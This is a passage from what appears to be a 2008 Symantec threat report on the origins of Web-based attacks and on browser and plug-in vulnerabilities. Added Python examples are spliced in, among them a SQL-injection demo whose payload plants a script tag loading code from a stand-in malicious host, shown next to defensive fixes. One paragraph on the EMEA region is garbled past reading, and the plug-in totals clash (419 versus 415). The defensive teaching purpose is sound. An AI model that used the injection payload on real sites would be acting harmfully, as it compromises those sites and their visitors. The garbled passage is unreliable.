    In 2008, computers in the United States were the leading source of Web-based attacks against users, accounting for 38 percent of the total (table 4). There are a number of factors that make the United States the top country of origin for Web-based attacks. This ranking may be due in part to the more than half a million websites that were compromised in May 2008 with malicious code hosted in Russia and the United States. Web forums running PHP-based bulletin board applications were exploited to inject malicious JavaScript into forum content. These forums would then infect visitors with variants of the Zlob Trojan80 disguised as a video codec installer. The exploit changes browser and DNS settings on the infected computer and enables additional attacks, including turning the infected computer into a zombie.81 This attack follows the trend of attackers inserting malicious code into legitimate high-traffic websites, where users are likely to be more trusting of the content, rather than attempting to lure users to specially designed malicious sites.

    Rank   Country          Percentage
    1      United States    38%
    2      China            13%
    3      Ukraine          12%
    4      Netherlands      8%
    5      Russia           5%
    6      United Kingdom   5%
    7      Canada           3%
    8      Japan            2%
    9      Latvia           1%
    10     France           1%

    Table 4. Top countries of origin for Web-based attacks

    Source: Symantec

    80 http://www.symantec.com/security_response/writeup.jsp?docid=2005-042316-2917-99
    81 http://www.channelregister.co.uk/2008/05/13/zlob_trojan_forum_compromise_attack/


    In 2008, China ranked second as a country of origin for Web-based attacks, with 13 percent of the worldwide total. The main reason for China's high rank in 2008 is compromised websites relating to the 2008 Beijing Olympic Games. The Games were one of the largest events of 2008, and attackers exploited the popularity of the event in their attempts to lure and compromise users, as has been seen previously with other major sporting and entertainment events.82 One example is the Rustock botnet, which sent out emails with links to a news report about the Games. Users were prompted to click a link in the email and visit a site, which then prompted them to download a missing codec in order to play a video; clicking to obtain the codec actually installed a Trojan. Attackers may also have used social engineering to lure users to compromised websites under the guise of an association with the 2008 Beijing Olympic Games, as attacks against Chinese-language websites increased significantly during the Games.83 The extent of these attacks was mitigated, however, by initiatives to increase online security for users ahead of the Games by shutting down or blacklisting thousands of websites potentially most susceptible to fraud, which are popular targets of attack through Web application and site-specific vulnerabilities. Also, thousands of websites in China were compromised when certain Web applications were infected with malicious JavaScript planted through SQL-injection attacks.84 Visitors to these compromised sites had their computers attacked and, if the attacks were successful, Trojans were downloaded onto the computers.85
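    The mass compromises described here and in the United States discussion above (malicious JavaScript planted in forum and Web-application content through SQL injection) follow one pattern: a string-built UPDATE or INSERT lets a single request rewrite every row of a text column that is later rendered to visitors. As an added illustration, not code from the report or from any of the affected applications, the Python below models a forum's "edit post" handler against an in-memory SQLite database, shows the injected payload appending a script tag to every post, and then the two fixes a practitioner applies: a parameterised query so the payload stays data, and HTML escaping at render time so even stored markup is inert. Table and column names, the hostname (on the reserved .test domain) and the payload are constructed for the example.

```python
import html
import sqlite3

# Constructed: the script an attacker wants every visitor's browser to load.
INJECTED_TAG = '<script src="http://malicious.example.test/x.js"></script>'

# Payload submitted as the new body of the attacker's own post. The leading
# quote closes the string literal, the rest rewrites every row, and "--"
# comments out the handler's WHERE clause.
PAYLOAD = "' || body || '" + INJECTED_TAG + "' WHERE 1=1 -- "


def make_forum():
    """Fresh in-memory forum with two posts by two users (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, author TEXT, body TEXT)")
    conn.executemany("INSERT INTO posts (author, body) VALUES (?, ?)",
                     [("alice", "Welcome to the forum"), ("bob", "Hello")])
    conn.commit()
    return conn


def edit_post_vulnerable(conn, post_id, author, new_body):
    """The flaw: user input is pasted into the SQL text."""
    sql = "UPDATE posts SET body = '%s' WHERE id = %d AND author = '%s'" % (
        new_body, post_id, author)
    conn.execute(sql)
    conn.commit()
    return sql  # returned so the example can show what the database actually ran


def edit_post_safe(conn, post_id, author, new_body):
    """The fix: placeholders keep the body as a bound value, never as SQL."""
    conn.execute("UPDATE posts SET body = ? WHERE id = ? AND author = ?",
                 (new_body, post_id, author))
    conn.commit()


def all_bodies(conn):
    """Post bodies in id order, as a visitor's page would read them."""
    return [row[0] for row in conn.execute("SELECT body FROM posts ORDER BY id")]


def render_post(body):
    """Second layer: escape on output so stored markup displays as text."""
    return "<p>" + html.escape(body, quote=True) + "</p>"


if __name__ == "__main__":
    forum = make_forum()
    print(edit_post_vulnerable(forum, 2, "bob", PAYLOAD))
    print(all_bodies(forum))       # every post now ends with the script tag

    forum = make_forum()
    edit_post_safe(forum, 2, "bob", PAYLOAD)
    print(all_bodies(forum))       # only bob's post changed, and it holds the literal payload
    print(render_post(all_bodies(forum)[1]))  # and it renders as harmless text
```

    The two layers are independent on purpose: the parameterised query stops the attacker from touching other users' rows at all, and output escaping means that even a payload stored legitimately (or planted through some other bug) never reaches visitors' browsers as executable markup. Neither layer substitutes for the other.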

    Ukraine ranked third in 2008 as a country of origin for Web-based attacks, accounting for 12 percent of such attacks worldwide. The prominence of Ukraine in this metric is likely due to the compromise of the website of a U.S.-based electronic bill payment processing company.86 The attackers obtained credentials for the company's domain using a phishing attack, and were then able to take control of the company's website. Customers, thinking they were visiting the legitimate website, were redirected to a malicious website hosted on servers in Ukraine, where they were attacked with a Trojan.87 In addition to the compromise of the bill payment company's website, at least 71 other domains were redirected to the malicious Ukrainian server during this time.88

    Of note, six of the top 10 countries for Web-based attacks in the EMEA region were also in the top 10 countries of origin for Web-based attacks globally, and countries in the EMEA region accounted for 41 percent of the worldwide total, more than any other region. Exploit packs may be one of the reasons behind the prominence of the EMEA region in this measure. Many exploit packs, including MPack,89 IcePack,90 and Neosploit,91 originated in Russia, and it is likely that the Russians who developed these attack kits are responsible for much of their continued propagation. These attackers may be compromising websites around the world and redirecting visitors to computers in EMEA that host the exploit code used to target client-side vulnerabilities in Web browsers.

    Also cobug o h oc of h emeA go hs od w a ub of hgh-ofl Wb-

    basd aacks ha occud h. O xal was Jaua 2008, wh h bass wbs of h

    nhlads russa was coosd ad vsos o h s w sld o sallg alcous

    cod.92 Aoh xal occud Augus 2008 wh sval hudd doas h nhlads w

    coosd ad dfacd.93 A hd cas was wh o ha a housad UK wbss w coosd

82 http://news.bbc.co.uk/1/hi/technology/7548870.stm
83 http://www.networkworld.com/newsletters/gw/2008/090808sg1.html
84 http://www.h-online.com/security/Chinese-websites-under-mass-attack--/news/110764
85 Ibid.
86 http://www.networkworld.com/news/2008/120508-network-solutions-phishing-came-before.html
87 http://www.csoonline.com/article/474365/CheckFree_Warns_Million_Customers_After_Hack
88 http://blog.kievukraine.info/2008/12/digging-deeper-into-checkfree-attack.html
89 https://forums2.symantec.com/t5/blogs/blogarticlepage/blog-id/vulnerabilities_exploits/article-id/93#M93
90 https://forums2.symantec.com/t5/Vulnerabilities-Exploits/Honor-Among-Thieves/ba-p/306084#A193
91 http://blogs.zdnet.com/security/?p=1593
92 http://www.theregister.co.uk/2008/01/23/embassy_sites_serve_malware/
93 http://blogs.zdnet.com/security/?p=1788


and users visiting these sites risked being infected with the Asprox Trojan.94 The success of these attacks on government sites can be attributed, in part, to the inherent trust that visitors to such sites will have, making these visitors more liable to accept prompts to download files if requested.

Web-based attacks are a major threat to computer networks for both enterprises and end users. Attacks such as drive-by downloads are covert and very difficult to mitigate because most users are unaware that they are being attacked. Organizations are thus confronted with the complicated task of having to detect and filter attack traffic from legitimate traffic. Since many organizations rely on Web-based tools and applications to conduct business, it is likely that the Web will continue to be the primary conduit for attack activity favored by malicious code developers.

Threat activity—protection and mitigation

There are a number of measures that enterprises, administrators, and end users can employ to protect against malicious activity. Organizations should monitor all network-connected computers for signs of malicious activity, including bot activity and potential security breaches, ensuring that any infected computers are removed from the network and disinfected as soon as possible. Organizations should employ defense-in-depth strategies, including the deployment of antivirus software and a firewall.95 Administrators should update antivirus definitions regularly and ensure that all desktop, laptop, and server computers are updated with all necessary security patches from their operating system vendor. As compromised computers can be a threat to other systems, Symantec also recommends that enterprises notify their ISPs of any potentially malicious activity.

Symantec recommends that organizations perform both ingress and egress filtering on all network traffic to ensure that malicious activity and unauthorized communications are not taking place. Organizations should also filter out potentially malicious email attachments to reduce exposure to enterprises and end users. In addition, egress filtering is one of the best ways to mitigate a DoS attack. DoS victims frequently need to engage their upstream ISP to help filter the traffic to mitigate the effects of attacks.

Symantec also advises that users never view, open, or execute any email attachment unless the attachment is expected and comes from a known and trusted source, and unless the purpose of the attachment is known. By creating and enforcing policies that identify and restrict applications that can access the network, organizations can minimize the effect of malicious activity, and hence, minimize the effect on day-to-day operations. Also, administrators should limit privileges on systems for users that do not require such access and they should also restrict unauthorized devices, such as external portable hard-drives and other removable media.

94 http://technology.timesonline.co.uk/tol/news/tech_and_web/the_web/article4381034.ece
95 Defense-in-depth emphasizes multiple, overlapping, and mutually supportive defensive systems to guard against single-point failures in any specific technology or protection methodology. Defense-in-depth should include the deployment of antivirus, firewalls, and intrusion detection systems, among other security measures.


To reduce the likelihood of identity theft, organizations that store personal information should take the necessary steps to protect data transmitted over the Internet or stored on their computers. This should include the development, implementation, and enforcement of a secure policy requiring that all sensitive data is encrypted. Organizations should implement a data loss protection (DLP) solution that not only prevents data breaches, but also mitigates potential data leaks from within an organization. Access to sensitive information should be restricted and organizations should also enforce compliance to information storage and transmission standards such as the PCI standard.96 Policies that ensure that computers containing sensitive information are kept in secure locations and are accessed only by authorized individuals should be put in place and enforced. Sensitive data should not be stored on mobile devices that could be easily misplaced or stolen. This step should be part of a broader security policy that organizations should develop and implement in order to ensure that any sensitive data is protected from unauthorized access. This would ensure that even if the computer or medium on which the data were stored were lost or stolen, the data would not be accessible.

96 https://www.pcisecuritystandards.org/


    Vulnerability Trends

This section will discuss selected vulnerability trends in greater depth, providing analysis and discussion of the trends indicated by the data. The following metrics will be discussed:

Window of exposure for Web browsers

Web browser vulnerabilities

Web browser plug-in vulnerabilities

Web browser plug-in vulnerabilities, by type

Web application vulnerabilities

Site-specific cross-site scripting vulnerabilities

Zero-day vulnerabilities

Top attacked vulnerabilities

Attacked vulnerabilities by attack vector (client versus server)

Vulnerabilities—protection and mitigation

    Window of exposure for Web browsers

The window of exposure for Web browsers is the difference in days between the time when exploit code affecting a vulnerability is made public and the time when the affected vendor makes a patch publicly available for that vulnerability. During this time, the computer or system on which the affected application is deployed may be susceptible to attack. The metric is derived from the average amount of time it took to release a patch in comparison to the average amount of time it took for exploit code to be made publicly available. This metric also includes maximum patch times, which is the maximum amount of time required to release a patch for all of the patched vulnerabilities in the data set.

By measuring the amount of time it takes for vendors to release patches for vulnerabilities, it is possible to gain some insight into their overall security responsiveness. Some of the vulnerabilities examined in this metric were patched by the vendor at the time they were announced. This may be reflective of an internal security audit by the vendor, which may have revealed the vulnerability. It may also indicate that security researchers discovered the vulnerability and responsibly disclosed it to the vendor. Other vulnerabilities may be independently reported by security researchers prior to the release of a patch. This indicates that security researchers did not coordinate with the vendor to disclose the vulnerability. In some cases, this may mean that the researcher did not responsibly disclose the vulnerability, and in other cases it is possible that the researcher attempted to responsibly report the vulnerability but the vendor was unresponsive. The patch release time is compared against the average time it takes for vulnerability exploits to become publicly available to determine the window of exposure.

The window of exposure takes all of these factors into account to calculate the average time during which end users and organizations are exposed to exploits. During the window of exposure, administrators and end users need to mitigate the possibility of exploitation by employing current best practices and the best available mitigation technologies. For high priority vulnerabilities, organizations must devote resources to mitigation until the vulnerability is adequately addressed and eliminated as a risk.
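To make the metric concrete, here is an added example (not Symantec's method or data) that computes the window of exposure and the maximum patch time exactly as the paragraphs above describe: the average patch time compared with the average time for exploit code to appear, over a constructed sample set of four patched vulnerabilities. The identifiers V-1 to V-4 and all dates are invented; the choice to count only vulnerabilities that actually had public exploit code toward the exploit average, and to report a negative difference as zero, is this example's assumption.

```python
"""Window-of-exposure calculation on constructed data (not Symantec's data set)."""
from dataclasses import dataclass
from datetime import date
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class PatchedVuln:
    vuln_id: str                    # constructed identifier, not a real advisory ID
    disclosed: date                 # day the vulnerability became public
    patched: date                   # day the vendor's fix became available
    exploit_public: Optional[date]  # day public exploit code appeared, None if never


def patch_time(v: PatchedVuln) -> int:
    """Days from public disclosure to the vendor patch (0 = patched at announcement)."""
    return (v.patched - v.disclosed).days


def exploit_time(v: PatchedVuln) -> Optional[int]:
    """Days from public disclosure to public exploit code, or None if no exploit appeared."""
    return (v.exploit_public - v.disclosed).days if v.exploit_public else None


def window_of_exposure(vulns: List[PatchedVuln]) -> Tuple[float, int]:
    """Return (window_days, max_patch_days).

    Average patch time compared with the average time for exploit code to
    appear. Only vulnerabilities that had public exploit code contribute to
    the exploit average (an assumption of this example). A negative
    difference means patches on average preceded exploits, reported as 0.
    """
    if not vulns:
        raise ValueError("need at least one patched vulnerability")
    patch_times = [patch_time(v) for v in vulns]
    exploit_times = [t for t in map(exploit_time, vulns) if t is not None]
    avg_patch = sum(patch_times) / len(patch_times)
    avg_exploit = sum(exploit_times) / len(exploit_times) if exploit_times else 0.0
    return max(0.0, avg_patch - avg_exploit), max(patch_times)


def exposed_vulns(vulns: List[PatchedVuln]) -> List[str]:
    """IDs of vulnerabilities whose exploit code appeared before the patch, the
    individual cases that actually opened an exposure window for users."""
    out = []
    for v in vulns:
        e = exploit_time(v)
        if e is not None and e < patch_time(v):
            out.append(v.vuln_id)
    return out


# Constructed sample set: four patched vulnerabilities for one hypothetical browser.
SAMPLE_VULNS = [
    PatchedVuln("V-1", date(2008, 3, 1), date(2008, 3, 1), date(2008, 3, 5)),    # patched at announcement
    PatchedVuln("V-2", date(2008, 5, 10), date(2008, 6, 9), date(2008, 5, 12)),  # exploit 28 days before patch
    PatchedVuln("V-3", date(2008, 7, 1), date(2008, 7, 15), None),               # no public exploit
    PatchedVuln("V-4", date(2008, 9, 1), date(2008, 9, 13), date(2008, 9, 4)),   # exploit 9 days before patch
]

if __name__ == "__main__":
    window, max_patch = window_of_exposure(SAMPLE_VULNS)
    print(f"window of exposure: {window:.1f} days, maximum patch time: {max_patch} days")
    print("exposed before patch:", exposed_vulns(SAMPLE_VULNS))
```

On the sample set the average patch time is 14 days and the average exploit time 3 days, so the window is 11 days with a 30-day maximum patch time. Note how a single slow patch (V-2) dominates both figures, which is the effect the Safari discussion below attributes to one 156-day patch.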


This metric will examine the window of exposure for the following Web browsers:97

Apple Safari

Google Chrome

Microsoft Internet Explorer

Mozilla browsers

Opera

In 2008, the average window of exposure for Safari was nine days, based on a sample set of 31 patched vulnerabilities (figure 9). The window of exposure for 2007 was one day, based on a sample set of 31 patched vulnerabilities. The eight-day increase in the window of exposure for Safari is due to a number of independently discovered vulnerabilities. The maximum time for Apple to patch a Safari vulnerability in 2008 was 156 days, which greatly affected the average and is significantly longer than the maximum patch time of eight days in 2007.

[Figure 9: chart of the average window of exposure in days, 2007 and 2008, for Safari, Chrome, Internet Explorer, Mozilla, and Opera; the per-browser values are discussed in the text.]


For the first time in this report, Chrome is included in the browsers being assessed by Symantec. Because it was released only recently (September 2008), it is being included in the panel to provide insight into its performance against other browsers thus far and to set a baseline for future reports. In 2008, Symantec documented an average window of exposure of three days for Chrome based on a sample set of six patched vulnerabilities. The maximum patch time for a vulnerability was 11 days.

The window of exposure for Opera in 2008 was one day, based on a sample set of 33 patched vulnerabilities. In 2008, the maximum time to patch a vulnerability was 29 days. In 2007, the window of exposure for Opera was two days, based on a sample set of 14 patched vulnerabilities, and the maximum patch time was 23 days.

Mozilla browsers had a window of exposure of less than one day in 2008, based on a sample set of 83 patched vulnerabilities, and the maximum patch time was 30 days. In 2007, Mozilla browsers had a window of exposure of three days, for a sample set of 103 vulnerabilities, and the maximum patch time was 109 days.

Of all the browser vendors examined, Mozilla browsers maintained the shortest window of exposure while patching more vulnerabilities than other vendors. This may be indicative of the efforts to marshal the security community to responsibly report vulnerabilities through initiatives such as the Bug Bounty program.98 The result of this effort is that more vulnerabilities are announced by the vendor at the time they are fixed, instead of being publicly reported by security researchers independently of the vendor.

It is also worth noting that independent browser vendors, such as Opera and the Mozilla Foundation, had a shorter window of exposure in 2008 than the major operating system vendors, such as Apple and Microsoft. This may be due to the possibility that vendors whose primary product is a Web browser do not have to spread their security response efforts across multiple, disparate products, and can instead focus on the browser. Comparatively, major operating system vendors typically have to coordinate security response efforts across a larger number of unpatched vulnerabilities affecting a more diverse product portfolio and organization. Vulnerabilities in other products may take priority based on a number of factors such as the severity of the vulnerability, attack activity in the wild, or the relative ease of developing a patch. Because Chrome is a new addition for this volume, it remains to be seen how Google will fare in the long term as a large vendor whose Web browser technology represents only a small portion of the products and services it offers.

    Web browser vulnerabilities

Web browser vulnerabilities are a serious security concern due to their role in online fraud and the propagation of malicious code, spyware, and adware. They are particularly prone to security concerns because they are exposed to a greater amount of potentially untrusted or hostile content than most other applications. This is a concern because attacks can originate from malicious websites as well as legitimate websites that have been compromised to serve malicious content. Browsers can also facilitate client-side attacks because of the use of plug-ins and other applications in handling potentially malicious content served from the Web such as documents and media files.

98 http://www.mozilla.org/security/bug-bounty-faq.html


This metric will examine the total number of vulnerabilities affecting the following Web browsers:

Apple Safari

Google Chrome

Microsoft Internet Explorer

Mozilla browsers

Opera

During 2008, 99 vulnerabilities affected Mozilla browsers (figure 10). Forty of these vulnerabilities were considered low severity and 59 were considered medium severity. This is fewer than the 122 vulnerabilities that were documented in 2007 for Mozilla browsers, of which 91 were considered low severity and 31 were considered medium severity.

Figure 10. Web browser vulnerabilities (documented vulnerabilities per period)

Browser              2007   2008
Mozilla               122     99
Internet Explorer      57     47
Safari                 47     40
Opera                  19     35
Chrome                  -     11

Source: Symantec

Internet Explorer was subject to 47 new vulnerabilities in 2008. Sixteen of these vulnerabilities were considered low severity and 31 were considered medium severity. This is fewer than the 57 new vulnerabilities documented in Internet Explorer in 2007, of which 28 were considered low severity, 28 were considered medium severity, and one was considered high severity.

Safari was affected by 40 new vulnerabilities in 2008, of which 16 were considered low severity and 24 were considered medium severity. This is less than the 47 vulnerabilities identified in Safari in 2007, of which 27 were considered low severity, 19 were considered medium severity, and one was considered high severity.


In 2008, Symantec documented 35 new vulnerabilities in Opera, of which 12 were considered low severity and 23 were considered medium severity. This is more than the 19 vulnerabilities discovered in Opera in 2007, of which eight were considered low severity and 11 were considered medium severity.

Chrome was affected by 11 vulnerabilities in 2008, of which seven were considered low severity and four were considered medium severity. Chrome was released in September 2008 and no comparison with previous years is possible.

With the exception of Opera (and, as noted, Chrome), there were fewer browser vulnerabilities identified in 2008 than those in 2007. The entrance of Chrome into the browser market and the increasing browser market share of Opera may have influenced security research on these browsers and shifted attention away from other browsers. The trend toward fewer total vulnerabilities in browsers may also indicate a shift by the vendors to improve the security of browsers.

However, it is also worth noting that the trend in 2008 was toward more medium-severity vulnerabilities in browsers. This may correlate with the overall trend toward a higher proportion of medium-severity vulnerabilities in relation to all vulnerabilities documented in 2008. This may also be indicative of evolving skills among security researchers and attackers, who are identifying fewer low-severity vulnerabilities as a result. It should be noted that, in many cases, medium-severity vulnerabilities are sufficient to mount successful attacks if attackers are able to execute arbitrary code and perform actions such as accessing confidential information or making network connections.

It is important for browser vendors to continue to improve browser security given the continuous competition among vendors to develop more feature-rich products. In 2008, a number of browser vendors made concerted efforts to demonstrate their commitment to security. In particular, Google released the Browser Security Handbook, which outlines common browser security issues.99 The goal of this project is to aid browser developers and security researchers in their understanding of these vulnerabilities to help identify and fix these issues. Mozilla has also started the Mozilla Security Metrics project as an attempt to quantify the relative security of their browser products.100

Web browsers continue to be an attractive target for attackers. In 2008, Internet Explorer was the target of a zero-day vulnerability in its XML-handling code.101 This vulnerability was linked with SQL-injection attacks that compromised trusted websites for the purposes of hosting exploit code for the vulnerability.102 This technique was detailed in the previous volume of the Symantec Global Internet Security Threat Report.103 It is a continuing trend in 2008 for attackers to use Web-application vulnerabilities to compromise legitimate websites from which further attacks can then be launched. This exploit is also noteworthy because it attempts to obfuscate signs of an attack by closing the browser cleanly without any prompts once exploitation has occurred. This is a measure undertaken by attackers to extend the survivability of zero-day exploits. A zero-day browser vulnerability is a highly valued asset that attackers work to protect against discovery by victims and security vendors. Prolonging the discovery of a zero-day vulnerability delays the development of vendor patches and security content, such as intrusion prevention signatures that help with mitigation.

99 http://code.google.com/p/browsersec/wiki/Main
100 http://blog.mozilla.com/security/2008/07/02/mozilla-security-metrics-project/
101 https://forums2.symantec.com/t5/Vulnerabilities-Exploits/Yes-There-s-a-Zero-Day-Exploit-for-Internet-Explorer-Out-There/ba-p/371628#A180
102 https://forums2.symantec.com/t5/Vulnerabilities-Exploits/Rise-of-IE-Zero-Day-Through-SQL-Injection/ba-p/372832#A182
103 http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_internet_security_threat_report_xiii_04-2008.en-us.pdf : p. 34


Another noteworthy browser security issue in 2008 was the carpet bombing flaw discovered in Safari.104 The vulnerability would cause the browser to download arbitrary files to the victim's desktop. It was later discovered that this could further be exploited to execute code. This issue was actually a combination of security weaknesses in Safari for Windows, Internet Explorer, and Microsoft Windows that, when exploited in tandem, could result in the deployment of a malicious executable. This is interesting because the deployed environment of the browser was a factor that elevated a relatively minor vulnerability to a major one. This presents a risk for browser vendors when they release products for new platforms, as Apple did with its first non-beta release of Safari 3.1 for Windows in March 2008. This concern may be relevant for Chrome, as Google is expected to release versions of the browser for Linux and Mac OS X in 2009.105

Administrators should maintain a restrictive policy regarding which applications are allowed within the organization. The security of applications should be evaluated on a platform-by-platform basis to ensure that platform-specific security issues do not arise when the application is installed.

    Web browser plug-in vulnerabilities

This metric will examine the number of vulnerabilities affecting plug-ins for Web browsers. Browser plug-ins are technologies that run inside the Web browser and extend its features. Often these plug-ins allow additional multimedia content from Web pages to be rendered in the browser. They can also enable execution environments that allow applications to be run inside the browser. Browser plug-in vulnerabilities are also used in a range of client-side attacks. Many browsers include various plug-ins in their default installation and provide a framework to ease the installation of additional plug-ins. Plug-ins now provide much of the expected or desired functionality of Web browsers and some may even be required to effectively use the internal sites of enterprises.

The following plug-in technologies will be examined:

Adobe Acrobat

Adobe Flash

Apple QuickTime

Microsoft ActiveX

Microsoft Windows Media Player

Mozilla browser extensions

Sun Java

In 2008, Symantec documented a total of 419 vulnerabilities in plug-in technologies for Web browsers. This is fewer than the 475 vulnerabilities affecting browser plug-ins identified in 2007. Of the total for 2008, 287 vulnerabilities affected ActiveX, which is significantly more than any other plug-in technology (figure 11). Of the remaining plug-ins for which vulnerabilities were documented, there were 45 vulnerabilities identified in Java, 40 in QuickTime, 17 in Acrobat Reader, 16 in Flash Player, five affected Mozilla extensions, and five that affected Windows Media Player.

104 http://www.securityfocus.com/brief/746
105 http://news.cnet.com/chrome-gets-mac-deadline-extensions-foundation/?tag=mncol;newsNow


Figure 11. Web browser plug-in vulnerabilities (share of documented plug-in vulnerabilities per period)

Plug-in                 2007   2008
ActiveX                  83%    69%
QuickTime                 8%    10%
Java                      4%    11%
Flash                     2%     4%
Acrobat                   1%     4%
Mozilla extensions        1%     1%
Windows Media Player      1%     1%

Source: Symantec

ActiveX was also affected by the most vulnerabilities in 2007, with a total of 399 out of the 475 vulnerabilities identified. After that, QuickTime ranked second with 37 vulnerabilities, Java was affected by 17, Flash Player had 11, four affected Mozilla extensions, three affected Windows Media Player, and three affected Adobe Acrobat Reader.

ActiveX vulnerabilities are still a popular method of attack for developers of attack toolkits such as NeoSploit. In 2008, a number of additional exploits for ActiveX added to the NeoSploit toolkit were identified. This includes a vulnerability in the Snapshot Viewer for Microsoft Access,106 and another in the Computer Associates BrightStor application.107 In fact, to exploit the Microsoft Access Snapshot Viewer vulnerability, attackers went to the length of silently installing the vulnerable control on client computers not previously affected by the vulnerability.108 This highlights underlying security issues in the ActiveX security model through which attackers are able to silently install vulnerable ActiveX components that are cryptographically signed by a vendor with a trusted certificate in the store of Internet Explorer.

The prevalence of ActiveX vulnerabilities poses a particular concern to end users and organizations that use Internet Explorer. While the market share of Internet Explorer 7 surpassed that of Internet Explorer 6 in 2008, the fact that ActiveX vulnerabilities are still a popular avenue of attack suggests that the security features of Internet Explorer 7 have not mitigated the ActiveX threat.109 It appears that end users are overriding these security features and continue to allow insecure ActiveX controls to be installed and executed. Microsoft Internet Explorer 8 is slated to include additional security features to manage the threat of insecure ActiveX controls.110 It is uncertain whether better ActiveX security in Internet Explorer 8 will have an effect on the number of vulnerabilities in the short term, since there are still many insecure

106 https://forums2.symantec.com/t5/Vulnerabilities-Exploits/Microsoft-Access-Snapshot-Viewer-Exploited-in-Neosploit-Wa/ba-p/335199#A164
107 https://forums2.symantec.com/t5/Vulnerabilities-Exploits/Neosploit-Updated-with-Exploit/ba-p/314840#A151
108 https://forums2.symantec.com/t5/Vulnerabilities-Exploits/ActiveX-Vulnerabilities-Even-When-You-Are-Not-Vulnerable-You-May/ba-p/341705#A165
109 http://www.w3schools.com/browsers/browsers_stats.asp
110 http://blogs.msdn.com/ie/archive/2008/05/07/ie8-security-part-iii-activex-improvements.aspx


ActiveX controls available for download on the Internet. However, there may be fewer incidents and examples of these vulnerabilities being incorporated into attack toolkits if the security measures being implemented by Microsoft are effective.

Other plug-in technologies such as Acrobat were also subject to exploitation in the wild.111 For instance, the number of plug-in vulnerabilities in Java rose due to increased interest from the security research community. Java is an attractive target because it runs on most Web browser versions on most operating systems. This means that many of the vulnerabilities in the Java plug-in facilitate the development of cross-platform exploit code. This presents an ideal scenario for attackers because it exposes a large number of targets to simple and reliable exploitation. Attackers seek vulnerabilities that affect widely deployed applications that can be attacked through the Web browser.

    Web browser plug-in vulnerabilities, by type

This discussion will examine some specific vulnerabilities that affect browser plug-ins. To do so, the vulnerabilities covered in the previous metric are classified into various categories based on their security impact. The impact of a vulnerability helps to determine the means by which an attacker accomplishes its goal by exploiting the vulnerability. It also helps administrators prioritize the risks posed by a specific vulnerability and develop mitigations that are proportionate to the threat.

The categories below are meant to highlight the primary impact on end users. It should be noted that some vulnerabilities defy categorization due to inadequate public information about the nature of the vulnerability and its potential impact. Vulnerabilities that could not be categorized are omitted from the discussion.

Vulnerabilities affecting browser plug-in technologies are classified into the following distinct categories:112

Memory corruption: These vulnerabilities allow attackers to corrupt the memory of an application process with malicious input and may allow attackers to execute arbitrary code.

Denial-of-service (DoS): DoS vulnerabilities typically result in an application crash when exploited. Although this could be due to a memory corruption issue, these vulnerabilities are classified as DoS when no potential for arbitrary code execution is apparent.

Information disclosure: These vulnerabilities permit the exposure of sensitive information to an unauthorized party, either as a result of active exploitation or as an adverse side effect of an erroneous condition in the application.

Content injection: These vulnerabilities allow the injection of malicious content or allow attackers to bypass third-party input validation filters; they can also enable cross-site scripting attacks.

Spoofing: These vulnerabilities allow an attacker to spoof elements of the browser user interface.

Unauthorized file system access: These vulnerabilities allow attackers to view, modify, or delete files on the computer hosting the affected browser plug-in.

111 https://forums2.symantec.com/t5/Vulnerabilities-Exploits/Acrobat-multi-f-Exploit-Detected-with-Existing-IPS/ba-p/364088#A176
112 For a more complete description of these categories, please see Appendix C—Vulnerability Trends Methodologies


Command execution: These vulnerabilities allow a remote attacker to execute operating system commands through an affected browser plug-in.

Origin validation: These vulnerabilities can occur when content from an invalid or unauthorized originating source is treated as valid by a plug-in.

Elevated security context: These vulnerabilities violate a security policy intended to prevent remote content from accessing system resources and capabilities. It should be noted that some vulnerabilities may present an opportunity for elevated security bypass but are more accurately described by another category.

In 2008, of the 415 vulnerabilities identified in browser plug-ins, 271 were classified as memory corruption vulnerabilities (figure 12). This is followed by 61 unauthorized file system access vulnerabilities, 27 elevated security context vulnerabilities, 14 DoS attack vulnerabilities, 13 information disclosure vulnerabilities, nine command execution vulnerabilities, eight origin validation vulnerabilities, four content injection vulnerabilities, and one vulnerability that facilitated spoofing attacks. The remaining seven vulnerabilities could not be classified due to insufficient information about their causes and effects.

[Figure 12: chart of 2008 browser plug-in vulnerabilities by type; the values are given in the paragraph above.]


Memory corruption vulnerabilities also made up the majority of plug-in vulnerabilities in 2007, with 288 being classified as such out of 475 total vulnerabilities identified (table 5). Of the remaining, 76 were considered DoS issues, 54 allowed unauthorized file system access, 24 allowed elevated security context, nine allowed command execution, eight allowed content injection, five vulnerabilities allowed information disclosure, and two were related to origin validation. There were no spoofing vulnerabilities in browser plug-in technologies in 2007 and nine vulnerabilities could not be classified due to a lack of information about the causes and effects of the vulnerabilities.

Memory corruption vulnerabilities constituted the majority of browser plug-in vulnerabilities in both 2007 and 2008. However, the data indicates that DoS vulnerabilities were less prevalent in 2008 than they were in 2007. In 2008, they were displaced by unauthorized file system access vulnerabilities as the second highest proportion of plug-in technology vulnerabilities. In October of 2008, Symantec reported the rise in unauthorized file system access vulnerabilities affecting ActiveX controls.113 At that time, attackers had integrated a number of exploits for these issues into attack toolkits, proving their effectiveness and popularity among attackers. In the same month, Symantec also observed new attack patterns for unauthorized file system access vulnerabilities that affected ActiveX controls.114 These attack patterns may allow attackers to exploit unauthorized file system access vulnerabilities to execute arbitrary code.

The decrease of DoS vulnerabilities and increase in vulnerabilities such as unauthorized file system access and elevated security context indicate an evolving skill set among security researchers and attackers. In particular, researchers and attackers are developing the skills to report higher-severity vulnerabilities that allow remote code execution and other serious consequences. This also explains the prevalence of memory corruption vulnerabilities in browser plug-ins because, if successfully exploited, they will let an attacker run arbitrary code on the affected computer. DoS vulnerabilities in plug-in technologies are often the result of unskilled security research efforts because they affect only client applica